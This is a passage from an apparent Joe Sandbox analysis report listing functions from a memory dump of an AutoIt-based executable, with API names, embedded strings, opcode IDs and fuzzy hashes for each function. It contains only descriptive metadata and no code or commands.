                                                                      • Instruction Fuzzy Hash: 7D12B216B98A5387EE64BF6984011BDE7A4AF94BA4BC84531DE4DC7391EF3CF44183A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                      • API String ID: 2091158083-3440237614
                                                                      • Opcode ID: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
                                                                      • Instruction ID: cb9d9e0d780108cd2ba3dad53382319be3036ffcf5ced43ec3fb7424cb144eaf
                                                                      • Opcode Fuzzy Hash: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
                                                                      • Instruction Fuzzy Hash: 0B71243161CA8295E710EF55E4547E9A720FB84BA8FC01132EE4E87B99DF7CE185C790
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: SendString$BuffCharDriveLowerType
                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                      • API String ID: 1600147383-4113822522
                                                                      • Opcode ID: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                                      • Instruction ID: a1e524d5edd5d05c2f8d5ac0bd2b97a41faaa0d107b524a3db5225155fb4bd14
                                                                      • Opcode Fuzzy Hash: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                                      • Instruction Fuzzy Hash: 18819E22B58B1285EB10BF65D8512BCA3B1FB64BA8B984431DA4DC7794DF3CF545C3A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                                                                      • String ID: .dll$.exe$.icl
                                                                      • API String ID: 258715311-1154884017
                                                                      • Opcode ID: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                                      • Instruction ID: b7fb92b4f4f984d81d46aa90a62360b431ec30451a61b1d2eb47062bafedd943
                                                                      • Opcode Fuzzy Hash: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                                      • Instruction Fuzzy Hash: 2271C532A0CA5282EB65AF2594446BAB3A0FB54FB8F840635ED1D87794DF3CF484C390
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                      • String ID:
                                                                      • API String ID: 3840717409-0
                                                                      • Opcode ID: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                      • Instruction ID: 0a04e1982a8d581305c39bac55c44acac97f98d490f1eeef2b6d0f4e9b6ba05c
                                                                      • Opcode Fuzzy Hash: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                      • Instruction Fuzzy Hash: 25517A36B18B1186EB14DF62E848A6973A0FB48FA8F944131DE1E83B44DF3DE485C750
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit
                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                      • API String ID: 2610073882-3931177956
                                                                      • Opcode ID: 8b012b72d9182424534d163227db5c9d184644b7672044e55a9e6dfc6ab7007a
                                                                      • Instruction ID: f47dfb51f4d0885ec074ebb1d247363798f2c59bf74340853c764eee6ca7d810
                                                                      • Opcode Fuzzy Hash: 8b012b72d9182424534d163227db5c9d184644b7672044e55a9e6dfc6ab7007a
                                                                      • Instruction Fuzzy Hash: E7027C72A8974295FA59BF65C15427DA3A1FB04FA0F8D4535CA0E87B94CF2DF890C3A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
                                                                      • String ID: aut
                                                                      • API String ID: 130057722-3010740371
                                                                      • Opcode ID: 587d8ff44f56b4c982e82ef7faa21eb4bcf6eabd1a57bd80e25ab706fdae8aa1
                                                                      • Instruction ID: 7e568354315f44da0b0fe3c67f5fc37dd4dd8ab8b399d085fe4697709f377137
                                                                      • Opcode Fuzzy Hash: 587d8ff44f56b4c982e82ef7faa21eb4bcf6eabd1a57bd80e25ab706fdae8aa1
                                                                      • Instruction Fuzzy Hash: B0C1A736658AC686EB30FF25E8501E9A360FB94798F804036EB4D8BB59DF7CE245C750
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopRect
                                                                      • String ID: tooltips_class32
                                                                      • API String ID: 2443926738-1918224756
                                                                      • Opcode ID: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                      • Instruction ID: a5a21b53cc214efd02b8cf4d98f7d40213cce191838ac2d81ad3ba18469c2002
                                                                      • Opcode Fuzzy Hash: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                      • Instruction Fuzzy Hash: 24918B32A18A8589E750EF65E4547ADB3B1FB88B98F804036DE4D87B58DF3CE045C760
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                      • String ID:
                                                                      • API String ID: 2598888154-3916222277
                                                                      • Opcode ID: 3994b7b28fef36ee27ebe09cd9ee49426cf7ca29f8cb3ed20e9a9f0582733bf5
                                                                      • Instruction ID: 29089eb4e85ec702bfebde8145b8a0a0eaa2ca7c8b3cca7b1ddcf4db1753f3ad
                                                                      • Opcode Fuzzy Hash: 3994b7b28fef36ee27ebe09cd9ee49426cf7ca29f8cb3ed20e9a9f0582733bf5
                                                                      • Instruction Fuzzy Hash: E3519676B19640CBE750EF75E444AAEB7B1FB48B98F408125EE4A93B18CF38E445CB50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                      • String ID: NULL Pointer assignment
                                                                      • API String ID: 2706829360-2785691316
                                                                      • Opcode ID: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                      • Instruction ID: 75d2885679731bd668a13e6952434616ab10f953e7449c5a35dc03cb447c37ed
                                                                      • Opcode Fuzzy Hash: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                      • Instruction Fuzzy Hash: C7516122A19A1289EB00FF65D8856BDA770FB84F98F844131DE0E87765DF78E085C790
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF7C0EEFD7B), ref: 00007FF7C0EF1143
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                      • API String ID: 3964851224-909552448
                                                                      • Opcode ID: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                      • Instruction ID: e7055d8342ba8be7be7251440c874df1567b2e3d59038554865eee3c0c181cb8
                                                                      • Opcode Fuzzy Hash: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                      • Instruction Fuzzy Hash: 3DE1A312F8965B85EA60BF6598402B8A290BF60FB4BC84571CA1DC77D4EF3CF94593A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                                      • String ID: *.*
                                                                      • API String ID: 4125642244-438819550
                                                                      • Opcode ID: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                                      • Instruction ID: 4a9f33535daba91612b695fa619891aae0fdb80aa5420a6814abf637c345faba
                                                                      • Opcode Fuzzy Hash: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                                      • Instruction Fuzzy Hash: 0381BF22A58B8286EB14FF15D9406BDA3A0FB44BA4FC80036DA4E87794DF7DF544C3A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                      • String ID: P
                                                                      • API String ID: 1460738036-3110715001
                                                                      • Opcode ID: 425b3d5a2051c68f0670dcdad59ee9d800cc35cf3d8f3cee648c2718cc05a541
                                                                      • Instruction ID: a08c6a703700d4f0145bc6684a664707760826cb4cd78ca767c2350c8838ad79
                                                                      • Opcode Fuzzy Hash: 425b3d5a2051c68f0670dcdad59ee9d800cc35cf3d8f3cee648c2718cc05a541
                                                                      • Instruction Fuzzy Hash: 85710622A0C65286F721FF2494442BEB761BB80BACF988431DA4D87781CF7DF546C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: LoadStringwprintf
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 3297454147-3080491070
                                                                      • Opcode ID: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                      • Instruction ID: b0675a93ccdddec53a6b20d58b77df1efba6bca0c8f2e773ee501dc00389e9c1
                                                                      • Opcode Fuzzy Hash: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                      • Instruction Fuzzy Hash: B4613D21A6CA5292EB00FF61E4405EDA361FB84764FC01432EA4D9379ADF7CF646C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Messagewprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                      • API String ID: 4051287042-2268648507
                                                                      • Opcode ID: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                      • Instruction ID: b851ab35070f15b029b15da91c59c6994155cb6c798a9ded360573229a5f21a0
                                                                      • Opcode Fuzzy Hash: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                      • Instruction Fuzzy Hash: B4516E21B58E5291EB00FF61E8454EDA321FB84764BC05432EA4D9379ADF7CF606C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
                                                                      • String ID: BUTTON
                                                                      • API String ID: 3935177441-3405671355
                                                                      • Opcode ID: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                      • Instruction ID: cc0ee49a22c1d25df6b9acc0ef6b0d44a3953fe9705e402d7660ea91d4d6fd17
                                                                      • Opcode Fuzzy Hash: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                      • Instruction Fuzzy Hash: C7314F20A0D61782FB55BF60E854B76A351AF84B78FC54031DA0E867A0CF7EF4C487A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 1974058525-0
                                                                      • Opcode ID: dcc26eb72664b9d1949b187f4fad04aff093ad4780d9238f6c635ec0504560de
                                                                      • Instruction ID: 0bd5e7694e567a426f9989773aea1b4848ba1febc5a3efbf03f74d660a269777
                                                                      • Opcode Fuzzy Hash: dcc26eb72664b9d1949b187f4fad04aff093ad4780d9238f6c635ec0504560de
                                                                      • Instruction Fuzzy Hash: 60913731A4DA0285EB54BFA5E490678A3A0BF88FA4FD84431CD4E87794DF7CF48583A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                      • String ID:
                                                                      • API String ID: 3096461208-0
                                                                      • Opcode ID: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                      • Instruction ID: d595ac0017e6f6967c44bfddd190c8d9e84182ab1f9e11fc466577c063caeae5
                                                                      • Opcode Fuzzy Hash: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                      • Instruction Fuzzy Hash: 2D619F72B082408BE718DF6AE44466DB7A2B788B98F548139DE09D3F48DF38E9458B50
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      • Opcode ID: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
